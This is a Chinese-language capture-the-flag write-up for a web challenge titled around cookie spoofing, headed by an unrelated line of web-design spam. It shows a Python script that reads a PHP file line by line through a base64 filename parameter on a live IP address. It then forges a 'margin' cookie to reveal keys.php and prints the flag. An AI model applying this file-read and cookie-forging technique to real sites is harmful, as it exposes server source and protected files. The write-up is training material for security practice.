贵阳观山湖区网站建设,专门做cos的网站,wordpress 加上广告,成都网络营销策划题目描述
题目截图如下#xff1a;
进入场景看看#xff1a;
解题思路
看源码看F12#xff1a;看请求链接看提示#xff1a;cookies欺骗
相关工具
插件#xff1a;ModHeader或者hackbarbase64解密
解题步骤
看源码 就是rfrgrggggggoaihegfdiofi48ty598whrefeoia…题目描述
题目截图如下
进入场景看看
解题思路
看源码看F12看请求链接看提示cookies欺骗
相关工具
插件ModHeader或者hackbarbase64解密
解题步骤
看源码 就是rfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibry字母的重复。 2. 看F12看请求链接
http://114.67.175.224:11931/index.php?line3filenamea2V5cy50eHQ好像有base64加密a2V5cy50eHQ,解密得到keys.txt。 这个文件内容和进入场景看到的一致http://114.67.175.224:11931/keys.txt 还有一个line参数修改并没有发生任何变化。我想不到要改keys.txt成index.phpbase64加密格式aW5kZXgucGhw
http://114.67.175.224:11931/index.php?line1filenameaW5kZXgucGhwline1时 line2时 以此类推得到该文件源码当然是用脚本跑不出来啦
import requestsa25 #表示index.php文件的代码行数
for i in range(a):urlhttp://114.67.175.224:11931/index.php?linestr(i)filenameaW5kZXgucGhwsrequests.get(url)print(s.text)
得到
? php
error_reporting(0);
$file base64_decode(isset($_GET[filename]) ? $_GET[filename] : );
$line isset($_GET[line]) ? intval($_GET[line]) : 0;
if ($file ) header(location:index.php?linefilenamea2V5cy50eHQ);
$file_list array(0 keys.txt,1 index.php,
);
if (isset($_COOKIE[margin]) $_COOKIE[margin] margin) {$file_list[2] keys.php;
}
if (in_array($file, $file_list)) {$fa file($file);echo $fa[$line];
} ?部分解释 定义了一个文件列表数组$file_list包含了两个默认的文件keys.txt和index.php。如果COOKIE中存在名为’margin’的值并且该值为’margin’则将一个名为’keys.php’的文件添加到文件列表中。也就是cookie值为margin时显示keys.php内容。 3.看提示cookies欺骗。即然没有什么其他的那就按照提示来。设置cookiemarginmargin,base64编码keys.php
http://114.67.175.224:11931/index.php?linefilenamea2V5cy5waHA得到Flag
flag{2457d80f9f5a80e6d24f0ed0ac47dabb}新知识点
Cookie 用户在登录之后通常会保存用户信息以便在其他需要权限的页面去验证用户信息是否具有访问权限。一个页面是否能够被访问判断依据是通过存储信息区域中用户的信息来判断的登录页面的作用就是 验证 用户输入的用户名密码的组合是否在数据库中存在如果存在则把信息保存在存储信息的区域以便各个页面去判断权限 信息存储区域对于我们来说至关重要一般常见的有两种形式session和cookies: 不同的用户在访问网站的时候 都会拥有各自的session或者cookies不同用户之间互不干扰。session在服务器端产生比较安全但是如果session较多则会影响性能. cookies在客户端产生安全性稍弱 session生命周期 在指定的时间如20分钟到了之后会结束不到指定的时间也会随着浏览器进程的结束而结束。cookies默认情况下也随着浏览器进程结束而结束但如果手动指定时间则不受浏览器进程结束的影响。 有用的话请点赞收藏评论帮助更多的同学哦
